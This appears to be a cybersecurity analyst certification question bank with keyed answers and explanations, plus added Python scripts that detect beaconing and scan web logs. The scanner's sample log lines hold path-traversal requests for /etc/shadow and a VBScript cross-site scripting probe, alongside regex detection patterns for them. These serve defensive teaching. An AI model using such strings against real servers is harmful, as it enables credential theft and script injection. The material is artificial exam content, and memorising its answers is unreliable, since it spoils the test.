B. Install an additional malware scanner that will send email alerts to the analyst.
C. Configure the system to use a proxy server for Internet access.
D. Delete the user profile and restore data from backup.

Correct Answer: A
Explanation

Explanation/Reference:
Updating the system firmware and reimaging the hardware is the best action to perform to remediate the
infected device, as it helps to ensure that the device is
restored to a clean and secure state and that any traces of malware are removed. Firmware is a type of
software that controls the low-level functions of a hardware device, such as a motherboard, hard drive, or
network card. Firmware can be updated or flashed to fix bugs, improve performance, or enhance security.
Reimaging is a process of erasing and restoring the data on a storage device, such as a hard drive or a
solid state drive, using an image file that contains a copy of the operating system, applications, settings,
and files. Reimaging can help to recover from system failures, data corruption, or malware infections.
Updating the system firmware and reimaging the hardware can help to remediate the infected device by
removing any malicious code or configuration changes that may have been made by the malware, as well
as restoring any missing or damaged files or settings that may have been affected by the malware. This
can help to prevent further damage, data loss, or compromise of the device or the network. The other
actions are not as effective or appropriate as updating the system firmware and reimaging the hardware,
as they do not address the root cause of the infection or ensure that the device is fully cleaned and
secured. Installing an additional malware scanner that will send email alerts to the analyst may help to
detect and remove some types of malware, but it may not be able to catch all malware variants or remove
them completely. It may also create conflicts or performance issues with other security tools or systems on
the device. Configuring the system to use a proxy server for Internet access may help to filter or monitor
some types of malicious traffic or requests, but it may not prevent or remove malware that has already
infected the device or that uses other methods of communication or propagation. Deleting the user profile
and restoring data from backup may help to recover some data or settings that may have been affected by
the malware, but it may not remove malware that has infected other parts of the system or that has
persisted on the device.

QUESTION 7
A cloud team received an alert that unauthorized resources were being auto-provisioned. After
investigating, the team suspects that cryptomining is occurring. Which of the following indicators would
most likely lead the team to this conclusion?

A. High GPU utilization
B. Bandwidth consumption
C. Unauthorized changes
D. Unusual traffic spikes

Correct Answer: A
Explanation

Explanation/Reference:
Cryptomining is compute-bound: unauthorized miners drive the CPU or GPU utilization of the provisioned
instances to near 100% for as long as they run, which is the distinctive indicator. Mining traffic to a pool is
light, so bandwidth consumption and traffic spikes point elsewhere, and the unauthorized changes are what
triggered the alert rather than what identifies the workload as mining.

QUESTION 8
A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of
resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security
team, which of the following groups should the issue be escalated to first in order to comply with industry
best practices?

A. Help desk
B. Law enforcement
C. Legal department
D. Board member

Correct Answer: C
Explanation

Explanation/Reference:
When updating a reporting policy that pertains to inappropriate use of resources, it's important to involve
the legal department as one of the first steps. Inappropriate use of resources can have legal implications,
and involving the legal department ensures that the policy aligns with legal regulations and requirements.
They can provide guidance on the appropriate actions to take and help ensure that the policy is
comprehensive and legally sound.

QUESTION 9
Given the following CVSS string:

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Which of the following attributes correctly describes this vulnerability?

A. A user is required to exploit this vulnerability.
B. The vulnerability is network based.
C. The vulnerability does not affect confidentiality.
D. The complexity to exploit the vulnerability is high.

Correct Answer: B
Explanation

Explanation/Reference:
AV:N: vulnerability is network-based
AC:L: attack complexity is low
PR:N: privileges are not required to exploit the vulnerability
UI:N: no user interaction required
S:U: scope of the impact is unchanged (unchanged scope).
C:H: confidentiality impact is high.
I:H: integrity impact is high.
A:H: availability impact is high.

The vulnerability is network based is the correct attribute that describes this vulnerability, as it can be
inferred from the CVSS string. CVSS stands for Common Vulnerability Scoring System, which is a
framework that assigns numerical scores and ratings to vulnerabilities based on their characteristics and
severity. The CVSS string consists of several metrics that define different aspects of the vulnerability, such
as the attack vector, the attack complexity, the privileges required, the user interaction, the scope, and the
impact on confidentiality, integrity and availability. The first metric in the CVSS string is the attack vector
(AV), which indicates how the vulnerability can be exploited. The value of AV in this case is N, which
stands for network. This means that the vulnerability can be exploited remotely over a network connection,
without physical or logical access to the target system. Therefore, the vulnerability is network based.

https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://packitforwarding.com/index.php/2019/01/10/comptia-cysa-common-vulnerability-scoring-system

QUESTION 10
A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of
its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation for the
system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:

Which of the following vulnerabilities should be prioritized for remediation?

A. 1
B. 2
C. 3
D. 4

Correct Answer: D
Explanation

Explanation/Reference:
Since the company is concerned with the accuracy of its data, the analyst must prioritize the integrity (I)
metric over confidentiality and availability. In the table (not reproduced on this page), vulnerabilities 1, 2
and 3 carry an integrity impact of L or N and are set aside; vulnerability 4, with the highest integrity
impact, is remediated first.

QUESTION 11
Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information
about the systems and vulnerabilities is shown in the tables below:

Which of the following should the security analyst prioritize for remediation?

A. rogers
B. brady
C. brees
D. manning

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 12
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the
following is the best method to ensure the data on the device is not modified?

A. Generate a hash value and make a backup image.
B. Encrypt the device to ensure confidentiality of the data.
C. Protect the device with a complex password.
D. Perform a memory scan dump to collect residual data

Correct Answer: A
Explanation

Explanation/Reference:
Hashing the drive before imaging it, hashing the image, and then working only from the image (with the
original attached through a write blocker) demonstrates that the evidence has not been modified: a
matching hash recorded in the chain-of-custody documentation can be reproduced later by any party.
Encrypting the device, protecting it with a password or dumping memory does nothing to prove that the
drive's contents are unchanged.

QUESTION 13
Which of the following best describes the goal of a tabletop exercise?

A. To test possible incident scenarios and how to react properly
B. To perform attack exercises to check response effectiveness
C. To understand existing threat actors and how to replicate their techniques
D. To check the effectiveness of the business continuity plan

Correct Answer: A
Explanation

Explanation/Reference:
A tabletop exercise is a type of simulation exercise that involves testing possible incident scenarios and
how to react properly, without actually performing any actions or using any resources. A tabletop exercise
is usually conducted by a facilitator who presents a realistic scenario to a group of participants, such as a
cyberattack, a natural disaster, or a data breach. The participants then discuss and evaluate their roles,
responsibilities, plans, procedures, and policies for responding to the incident, as well as the potential
impacts and outcomes. A tabletop exercise can help identify strengths and weaknesses in the incident
response plan, improve communication and coordination among the stakeholders, raise awareness and
preparedness for potential incidents, and provide feedback and recommendations for improvement.

QUESTION 14
A virtual web server in a server pool was infected with malware after an analyst used the internet to
research a system issue. After the server was rebuilt and added back into the server pool, users reported
issues with the website, indicating the site could not be trusted. Which of the following is the most likely
cause of the server issue?

A. The server was configured to use SSL to securely transmit data.
B. The server was supporting weak TLS protocols for client connections.
C. The malware infected all the web servers in the pool.
D. The digital certificate on the web server was self-signed.

Correct Answer: D
Explanation

Explanation/Reference:
A digital certificate is a document that contains the public key and identity information of a web server, and
is signed by a trusted third-party authority called a certificate authority (CA). A digital certificate allows the
web server to establish a secure connection with the clients using the HTTPS protocol, and also verifies
the authenticity of the web server. A self-signed certificate is a digital certificate that is not signed by a CA,
but by the web server itself. A self-signed certificate can cause issues with the website, as it may not be
trusted by the clients or their browsers. Clients may receive warnings or errors when trying to access the
website, indicating that the site could not be trusted or that the connection is not secure.

https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.techtarget.com/searchsecurity/quiz/Sample-CompTIA-CySA-test-questions-with-answers

QUESTION 15
A zero-day command injection vulnerability was published. A security administrator is analyzing the
following logs for evidence of adversaries attempting to exploit the vulnerability:
Which of the following log entries provides evidence of the attempted exploit?

A. Log entry 1
B. Log entry 2
C. Log entry 3
D. Log entry 4

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 16
A security analyst needs to ensure that systems across the organization are protected based on the
sensitivity of the content each system hosts. The analyst is working with the respective system owners to
help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the
data being hosted. Which of the following should the security analyst perform first to categorize and
prioritize the respective systems?

A. Interview the users who access these systems.
B. Scan the systems to see which vulnerabilities currently exist.
C. Configure alerts for vendor-specific zero-day exploits.
D. Determine the asset value of each system.

Correct Answer: D
Explanation

Explanation/Reference:
Determining the asset value of each system is the best action to perform first, as it helps to categorize and
prioritize the systems based on the sensitivity of the data they host. The asset value is a measure of how
important a system is to the organization, in terms of its financial, operational, or reputational impact. The
asset value can help the security analyst to assign a risk level and a protection level to each system, and
to allocate resources accordingly. The other actions are not as effective as determining the asset value, as
they do not directly address the goal of promoting confidentiality, availability, and integrity of the data.
Interviewing the users who access these systems may provide some insight into how the systems are
used and what data they contain, but it may not reflect the actual value or sensitivity of the data from an
organizational perspective. Scanning the systems to see which vulnerabilities currently exist may help to
identify and remediate some security issues, but it does not help to categorize or prioritize the systems
based on their data sensitivity. Configuring alerts for vendor-specific zero-day exploits may help to detect
and respond to some emerging threats, but it does not help to protect the systems based on their data
sensitivity.

QUESTION 17
A security analyst is reviewing the following alert that was triggered by FIM on a critical system:
Which of the following best describes the suspicious activity that is occurring?

A. A fake antivirus program was installed by the user.
B. A network drive was added to allow exfiltration of data.
C. A new program has been set to execute on system start.
D. The host firewall on 192.168.1.10 was disabled.

Correct Answer: C
Explanation

Explanation/Reference:
A new program has been set to execute on system start is the most likely cause of the suspicious activity
that is occurring, as it indicates that the malware has modified the registry keys of the system to ensure its
persistence. File Integrity Monitoring (FIM) is a tool that monitors changes to files and registry keys on a
system and alerts the security analyst of any unauthorized or malicious modifications.
The alert triggered by FIM shows that the malware has created a new registry key under the Run subkey,
which is used to launch programs automatically when the system starts. The new registry key points to a
file named “update.exe” in the Temp folder, which is likely a malicious executable disguised as a legitimate
update file.

https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/training/books/cysa-cs0-002-study-guide

QUESTION 18
Which of the following best describes the document that defines the expectation to network customers that
patching will only occur between 2:00 a.m. and 4:00 a.m.?

A. SLA
B. LOI
C. MOU
D. KPI

Correct Answer: A
Explanation

Explanation/Reference:

QUESTION 19
A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an
internal host to a blocklisted external server. Which of the following best describes the activity that is taking
place?

A. Data exfiltration
B. Rogue device
C. Scanning
D. Beaconing

Correct Answer: D
Explanation

Explanation/Reference:
Beaconing is the best term to describe the activity that is taking place, as it refers to the periodic
communication between an infected host and a blocklisted external server. Beaconing is a common
technique used by malware to establish a connection with a command-and-control (C2) server, which can
provide instructions, updates, or exfiltration capabilities to the malware. Beaconing can vary in frequency,
duration, and payload, depending on the type and sophistication of the malware. The other terms are not
as accurate as beaconing, as they describe different aspects of malicious activity. Data exfiltration is the
unauthorized transfer of data from a compromised system to an external destination, such as a C2 server
or a cloud storage service. Data exfiltration can be a goal or a consequence of malware infection, but it
does not necessarily involve blocklisted servers or consistent requests. A rogue device is a device that is
connected to a network without authorization or proper security controls. Rogue devices can pose a
security risk, as they can introduce malware, bypass firewalls, or access sensitive data. However, rogue
devices are not necessarily infected with malware or communicating with
blocklisted servers. Scanning is the process of probing a network or a system for vulnerabilities, open
ports, services, or other information. Scanning can be performed by legitimate administrators or malicious
actors, depending on the intent and authorization. Scanning does not imply consistent requests or
blocklisted servers, as it can target any network or system.
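
A concrete way to surface this pattern in SIEM data, as an added example that is not part of the question bank: it groups events by (source, destination), measures the inter-arrival gaps, and flags pairs whose gaps are regular, or whose destination is on a blocklist. The log format, addresses and blocklist entry are constructed.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed SIEM export: "<timestamp> src=<ip> dst=<ip> action=<allow|deny>".
# 192.168.10.25 contacts 203.0.113.7 roughly every 60 s; 192.168.10.40 browses
# 198.51.100.9 at irregular intervals.
SAMPLE_LOG = """\
2024-03-01T09:00:00Z src=192.168.10.25 dst=203.0.113.7 action=deny
2024-03-01T09:00:12Z src=192.168.10.40 dst=198.51.100.9 action=allow
2024-03-01T09:01:01Z src=192.168.10.25 dst=203.0.113.7 action=deny
2024-03-01T09:01:45Z src=192.168.10.40 dst=198.51.100.9 action=allow
2024-03-01T09:02:00Z src=192.168.10.25 dst=203.0.113.7 action=deny
2024-03-01T09:02:59Z src=192.168.10.25 dst=203.0.113.7 action=deny
2024-03-01T09:03:20Z src=192.168.10.40 dst=198.51.100.9 action=allow
2024-03-01T09:04:01Z src=192.168.10.25 dst=203.0.113.7 action=deny
2024-03-01T09:05:00Z src=192.168.10.25 dst=203.0.113.7 action=deny
2024-03-01T09:09:30Z src=192.168.10.40 dst=198.51.100.9 action=allow
"""

# Constructed blocklist entry (hypothetical C2 address).
BLOCKLIST = {"203.0.113.7"}


def parse_events(text):
    """Yield (timestamp, src, dst) for each line of the constructed log format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts_str, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        yield datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ"), kv["src"], kv["dst"]


def find_beacons(text, min_events=5, max_jitter=0.25, blocklist=()):
    """Return {(src, dst): mean_gap_seconds} for suspicious pairs.

    A pair is flagged as periodic when it has at least ``min_events`` events and
    the standard deviation of its inter-arrival gaps is at most ``max_jitter``
    times the mean gap (malware usually adds some jitter, hence the tolerance).
    A pair whose destination is blocklisted is flagged regardless of cadence,
    matching the scenario in the question.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in parse_events(text):
        by_pair[(src, dst)].append(ts)

    flagged = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps) if gaps else 0.0
        periodic = (len(stamps) >= min_events and avg > 0
                    and pstdev(gaps) <= max_jitter * avg)
        if periodic or pair[1] in blocklist:
            flagged[pair] = round(avg, 1)
    return flagged


if __name__ == "__main__":
    for (src, dst), gap in find_beacons(SAMPLE_LOG, blocklist=BLOCKLIST).items():
        print(f"possible beacon: {src} -> {dst} about every {gap}s")
```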

QUESTION 20
An incident response team is working with law enforcement to investigate an active web server
compromise. The decision has been made to keep the server running and to implement compensating
controls for a period of time. The web service must be accessible from the internet via the reverse proxy
and must connect to a database server. Which of the following compensating controls will help contain the
adversary while meeting the other requirements? (Choose two).

A. Drop the tables on the database server to prevent data exfiltration.
B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
C. Stop the httpd service on the web server so that the adversary cannot use web exploits.
D. Use microsegmentation to restrict connectivity to/from the web and database servers.
E. Comment out the HTTP account in the /etc/passwd file of the web server.
F. Move the database from the database server to the web server.

Correct Answer: BD
Explanation

Explanation/Reference:

QUESTION 21
An incident response team member is triaging a Linux server. The output is shown below:
Which of the following is the adversary most likely trying to do?

A. Create a backdoor root account named zsh.
B. Execute commands through an unsecured service account.
C. Send a beacon to a command-and-control server.
D. Perform a denial-of-service attack on the web server.

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 22
A SOC analyst identifies the following content while examining the output of a debugger command over a
client-server application:

getConnection(database01,"alpha" ,"AxTv.127GdCx94GTd");

Which of the following is the most likely vulnerability in this system?

A. Lack of input validation
B. SQL injection
C. Hard-coded credential
D. Buffer overflow

Correct Answer: C
Explanation

Explanation/Reference:
The most likely vulnerability in this system is a hard-coded credential. Hard-coding a credential is the
practice of embedding a username, password, or other sensitive value in the source code or configuration
file of a system or application. A hard-coded credential poses a serious security risk, as it can expose the
system or application to unauthorized access, data theft, or compromise if the credential is discovered or
leaked by an attacker. A hard-coded credential can also be difficult to change or rotate when needed, as
doing so may require modifying the code or file and redeploying the system or application.

QUESTION 23
A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

A. The host is not up or responding.
B. The host is running excessive cipher suites.
C. The host is allowing insecure cipher suites.
D. The Secure Shell port on this host is closed.

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 24
A managed security service provider is having difficulty retaining talent due to an increasing workload
caused by a client doubling the number of devices connected to the network. Which of the following would
best aid in decreasing the workload without increasing staff?

A. SIEM
B. XDR
C. SOAR
D. EDR

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 25
An employee is suspected of misusing a company-issued laptop. The employee has been suspended
pending an investigation by human resources. Which of the following is the best step to preserve
evidence?

A. Disable the user’s network account and access to web resources.
B. Make a copy of the files as a backup on the server.
C. Place a legal hold on the device and the user’s network share.
D. Make a forensic image of the device and create a SHA-1 hash.

Correct Answer: D
Explanation

Explanation/Reference:
Making a forensic image of the device and creating a SHA-1 hash is the best step to preserve evidence, as
it creates an exact copy of the device’s data and verifies its integrity. A forensic image is a bit-by-bit copy of
the device’s storage media, which preserves all the information on the device, including deleted or hidden
files. A SHA-1 hash is a cryptographic value that is calculated from the forensic image, which can be used
to prove that the image has not been altered or tampered with. The other options are not as effective as
making a forensic image and creating a SHA-1 hash, as they may not capture all the relevant data, or they
may not provide sufficient verification of the evidence’s authenticity.

https://www.sans.org/blog/forensics-101-acquiring-an-image-with-ftk-imager/
https://swailescomputerforensics.com/digital-forensics-imaging-hash-value/

QUESTION 26
An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited
time and resources. Which of the following best describes the threat actor attributed to the malicious
activity?

A. Insider threat
B. Ransomware group
C. Nation-state
D. Organized crime

Correct Answer: C
Explanation

Explanation/Reference:

QUESTION 27
A systems analyst is limiting user access to system configuration keys and values in a Windows
environment. Which of the following describes where the analyst can find these configuration items?

A. config.ini
B. ntds.dit
C. Master boot record
D. Registry

Correct Answer: D
Explanation

Explanation/Reference:
The registry is a database that stores system configuration keys and values in a Windows environment.
The registry contains information about the hardware, software, users, and preferences of the system. The
registry can be accessed and modified using the Registry Editor tool (regedit.exe) or the command-line tool
(reg.exe). The registry is organized into five main sections, called hives, which are further divided into
subkeys and values.
The other options are not the best descriptions of where the analyst can find system configuration keys
and values in a Windows environment. config.ini (A) is a file that stores configuration settings for some
applications, but it is not a database that stores system configuration keys and values. ntds.dit (B) is a file
that stores the Active Directory data for a domain controller, but it is not a database that stores system
configuration keys and values. Master boot record (C) is a section of the hard disk that contains information
about the partitions and the boot loader, but it is not a database that stores system configuration keys and
values.

QUESTION 28
While reviewing web server logs, a security analyst found the following line:

<IMG SRC='vbscript:msgbox("test")'>

Which of the following malicious activities was attempted?

A. Command injection
B. XML injection
C. Server-side request forgery
D. Cross-site scripting

Correct Answer: D
Explanation

Explanation/Reference:
XSS is a type of web application attack that exploits the vulnerability of a web server or browser to execute
malicious scripts or commands on the client-side. XSS attackers inject malicious code, such as JavaScript,
VBScript, HTML, or CSS, into a web page or application that is viewed by other users. The malicious code
can then access or manipulate the user’s session, cookies, browser history, or personal information, or
perform actions on behalf of the user, such as stealing credentials, redirecting to phishing sites, or
installing malware.

The line in the web server log shows an example of an XSS attack using VBScript. The attacker tried to
insert an <IMG> tag with a malicious SRC attribute that contains VBScript code. The VBScript code is
intended to display a message box with the text “test” when the user views the web page or application.
This is a simple and harmless example of XSS, but it could be used to test the vulnerability of the web
server or browser, or to launch more sophisticated and harmful attacks.

QUESTION 29
A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that
resolves to

A. This is a normal password change URL.
B. The security operations center is performing a routine password audit.
C. A new VPN gateway has been deployed.
D. A social engineering attack is underway.

Correct Answer: D
Explanation

Explanation/Reference:

QUESTION 30
A security analyst is performing vulnerability scans on the network. The analyst installs a scanner
appliance, configures the subnets to scan, and begins the scan of the network. Which of the following
would be missing from a scan performed with this configuration?

A. Operating system version
B. Registry key values
C. Open ports
D. IP address

Correct Answer: B
Explanation

Explanation/Reference:

QUESTION 31
A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the
underlying host. Which of the following patterns can the security analyst use to search the web server logs
for evidence of exploitation of that particular vulnerability?

A. /etc/shadow
B. curl localhost
C. ; printenv
D. cat /proc/self/

Correct Answer: A
Explanation

Explanation/Reference:
/etc/shadow is the pattern that the security analyst can use to search the web server logs for evidence of
exploitation of the LFI vulnerability that can be exploited to extract credentials from the underlying host. LFI
stands for Local File Inclusion, which is a vulnerability that allows an attacker to include local files on the
web server into the output of a web application. LFI can be exploited to extract sensitive information from
the web server, such as configuration files, passwords, or source code. The /etc/shadow file is a file that
stores the encrypted passwords of all users on a Linux system. If an attacker can exploit the LFI
vulnerability to include this file into the web application output, they can obtain the credentials of the users
on the web server. Therefore, the security analyst can look for /etc/shadow in the request line of the web
server logs to see if any attacker has attempted or succeeded in exploiting the LFI vulnerability.

https://partners.comptia.org/docs/default-source/resources/comptia-cysa-cs0-002-exam-objectives
https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
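
Searching the access log for these indicators, as an added example that is not part of the question bank: it percent-decodes the request target before matching (so an encoded ..%2Fetc%2Fshadow is found as well as the literal form), then applies the /etc/shadow pattern from this question and the script-scheme IMG SRC pattern from question 28. The log lines are constructed in Apache combined format.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (Apache combined format).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2024:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Mar/2024:10:00:07 +0000] "GET /index.php?page=../../../../etc/shadow HTTP/1.1" 200 1810 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Mar/2024:10:00:09 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 1810 "-" "curl/8.0"
198.51.100.2 - - [01/Mar/2024:10:01:13 +0000] "GET /search?q=%3CIMG%20SRC%3D%27vbscript%3Amsgbox%28%22test%22%29%27%3E HTTP/1.1" 200 320 "-" "Mozilla/5.0"
198.51.100.2 - - [01/Mar/2024:10:01:20 +0000] "GET /search?q=shadow+puppets HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, and the request line (method, target, protocol) plus status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

INDICATORS = {
    # LFI: the /etc/shadow target from this question (traversal prefixes precede it).
    "lfi_etc_shadow": re.compile(r"etc/shadow\b", re.IGNORECASE),
    # XSS: an IMG tag whose SRC uses a script scheme, as in the line from question 28.
    "xss_script_scheme_img": re.compile(
        r"<img[^>]*src\s*=\s*['\"]?\s*(?:vbscript|javascript):", re.IGNORECASE
    ),
}


def decode_target(target):
    """Percent-decode repeatedly so double-encoded payloads are visible too.
    Stops after a few rounds so pathological input cannot loop forever."""
    for _ in range(3):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def find_indicators(log_text):
    """Return (client_ip, indicator_name, decoded_target, status) for every
    request line matching an indicator. A 200 status with a non-trivial size on
    an LFI hit is worth a closer look: the file may actually have been served."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = decode_target(m.group("target"))
        for name, pattern in INDICATORS.items():
            if pattern.search(target):
                hits.append((m.group("ip"), name, target, int(m.group("status"))))
    return hits


if __name__ == "__main__":
    for ip, name, target, status in find_indicators(SAMPLE_LOG):
        print(f"{name}: {ip} requested {target} (HTTP {status})")
```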

QUESTION 32
A company is in the process of implementing a vulnerability management program. Which of the following
scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to
the vulnerability identification process?

A. Non-credentialed scanning
B. Passive scanning
C. Agent-based scanning
D. Credentialed scanning

Correct Answer: B
Explanation

Explanation/Reference:
Passive scanning involves monitoring network traffic to identify vulnerabilities without actively probing or
interacting with the devices. This method is relatively non-intrusive and can provide valuable information
without directly affecting the systems.
However, it's important to note that passive scanning might not identify all vulnerabilities, so a combination
of passive scanning and periodic credentialed scanning might be a balanced approach to ensure accurate
vulnerability assessment while minimizing disruption.

QUESTION 33
A company receives a penetration test report summary from a third party. The report summary indicates a
proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the
company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of
the following best practices should the company follow with this proxy?

A. Leave the proxy as is.
B. Decommission the proxy.
C. Migrate the proxy to the cloud.
D. Patch the proxy.

Correct Answer: B
Explanation

Explanation/Reference:
Since the proxy is not in use and has a critical vulnerability with a high CVSS score, the best course of
action is to decommission the proxy.
Patching the proxy might be an option if it were actively being used and could not be replaced, but since a
new proxy is already in place, decommissioning is the most appropriate action.

QUESTION 34
An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of
the following is most likely the issue with the system?

A. Access rights
B. Network segmentation
C. Time synchronization
D. Invalid playbook

Correct Answer: C
Explanation

Explanation/Reference:
When examining events in multiple systems and having difficulty correlating data points, the most likely
issue could be a lack of proper time synchronization across the systems. Time synchronization is crucial
for accurate event correlation and forensic analysis, as it ensures that events are properly aligned in
chronological order.

QUESTION 35
An analyst recommends that an EDR agent collect the source IP address, make a connection to the
firewall, and create a policy to block the malicious source IP address across the entire network
automatically. Which of the following is the best option to help the analyst implement this
recommendation?

A. SOAR
B. SIEM
C. SLA
D. IoC

Correct Answer: A
Explanation

Explanation/Reference:
SOAR (Security Orchestration, Automation, and Response) is the best option to help the analyst
implement the recommendation, as it reflects the software solution that enables security teams to integrate
and coordinate separate tools into streamlined threat response workflows and automate repetitive tasks.
SOAR is a term coined by Gartner in 2015 to describe a technology that combines the functions of security
incident response platforms, security orchestration and automation platforms, and threat intelligence
platforms in one offering. SOAR solutions help security teams to collect inputs from various sources, such
as EDR agents, firewalls, or SIEM systems, and perform analysis and triage using a combination of human
and machine power. SOAR solutions also allow security teams to define and execute incident response
procedures in a digital workflow format, using automation to perform low-level tasks or actions, such as
blocking an IP address or quarantining a device. SOAR solutions can help security teams to improve
efficiency, consistency, and scalability of their operations, as well as reduce
mean time to detect (MTTD) and mean time to respond (MTTR) to threats. The other options are not as
suitable as SOAR, as they do not match the description or purpose of the recommendation. SIEM (Security
Information and Event Management) is a software solution that collects and analyzes data from various
sources, such as logs, events, or alerts, and provides security monitoring, threat detection, and incident
response capabilities. SIEM solutions can help security teams to gain visibility, correlation, and context of
their security data, but they do not provide automation or orchestration features like SOAR solutions. SLA
(Service Level Agreement) is a document that defines the expectations and responsibilities between a
service provider and a customer, such as the quality, availability, or performance of the service. SLAs can
help to manage customer expectations, formalize communication, and improve productivity and
relationships, but they do not help to implement technical recommendations like SOAR solutions. IoC
(Indicator of Compromise) is a piece of data or evidence that suggests a system or network has been
compromised by a threat actor, such as an IP address, a file hash, or a registry key. IoCs can help to
identify and analyze malicious activities or incidents, but they do not help to implement response actions
like SOAR solutions.

QUESTION 36
An end-of-life date was announced for a widely used OS. A business-critical function is performed by some
machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date.
Which of the following best describes a security analyst’s concern?

A. Any discovered vulnerabilities will not be remediated.
B. An outage of machinery would cost the organization money.
C. Support will not be available for the critical machinery.
D. There are no compensating controls in place for the OS.

Correct Answer: A
Explanation

Explanation/Reference:
As the OS that controls the business-critical machinery is approaching its end-of-life date, it means that the
OS will no longer receive updates and security patches from the vendor. This leaves the OS and the
machinery susceptible to potential security breaches and attacks that could exploit these unpatched
vulnerabilities.

QUESTION 37
Which of the following describes the best reason for conducting a root cause analysis?

A. The root cause analysis ensures that proper timelines were documented.
B. The root cause analysis allows the incident to be properly documented for reporting.
C. The root cause analysis develops recommendations to improve the process.
D. The root cause analysis identifies the contributing items that facilitated the event.

Correct Answer: D
Explanation

Explanation/Reference:
The root cause analysis identifies the contributing items that facilitated the event is the best reason for
conducting a root cause analysis, as it reflects the main goal and benefit of this problem-solving approach.
A root cause analysis (RCA) is a process of discovering the root causes of problems in order to identify
appropriate solutions. A root cause is the core issue or factor that sets in motion the entire cause-and-
effect chain that leads to the problem. A root cause analysis assumes that it is more effective to
systematically prevent and solve underlying issues rather than just treating symptoms or putting out fires. A
root cause analysis can be performed using various methods, tools, and techniques that help to uncover
the causes of problems, such as events and causal factor analysis, change analysis, barrier analysis, or
fishbone diagrams. A root cause analysis can help to improve quality, performance, safety, or efficiency by
finding and eliminating the sources of problems. The other options are not as accurate as the root cause
analysis identifies the contributing items that facilitated the event, as they do not capture the essence or
value of conducting a root cause analysis. The root cause analysis ensures that proper timelines were
documented is a possible outcome or benefit of conducting a root cause analysis, but it is not the best
reason for doing so. Documenting timelines can help to establish the sequence of events and actions that
led to the problem, but it does not necessarily identify or address the root causes. The root cause analysis
allows the incident to be properly documented for reporting is also a possible outcome or benefit of
conducting a root cause analysis, but it is not the best reason for doing so. Documenting and reporting
incidents can help to communicate and share information about problems and solutions, but it does not
necessarily identify or address the root causes. The root cause analysis develops recommendations to
improve the process is another possible outcome or benefit of conducting a root cause analysis, but it is
not the best
reason for doing so. Developing recommendations can help to implement solutions and prevent future
problems, but it does not necessarily identify or address the root causes.

QUESTION 38
Which of the following concepts is using an API to insert bulk access requests from a file into an identity
management system an example of?

A. Command and control
B. Data enrichment
C. Automation
D. Single sign-on

Correct Answer: C
Explanation

Explanation/Reference:
Using an API to insert bulk access requests from a file into an identity management system is an example
of automation. Automation involves using technology, like APIs, scripts, or tools, to perform tasks and
processes automatically without manual intervention.

QUESTION 39
A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against
external threats regardless of the device’s operating system. Which of the following best meets this
requirement?

A. SIEM
B. CASB
C. SOAR
D. EDR

Correct Answer: D
Explanation

Explanation/Reference:
EDR stands for Endpoint Detection and Response, which is a layer of defense that monitors endpoints for
malicious activity and provides automated or manual response capabilities. EDR can protect against
external threats regardless of the device’s operating system, as it can detect and respond to attacks based
on behavioral analysis and threat intelligence. EDR is also one of the tools that CompTIA CySA+ covers in
its exam objectives.

https://www.comptia.org/certifications/cybersecurity-analyst
https://www.comptia.org/blog/the-new-comptia-cybersecurity-analyst-your-questions-answered
https://resources.infosecinstitute.com/certification/cysa-plus-ia-levels/

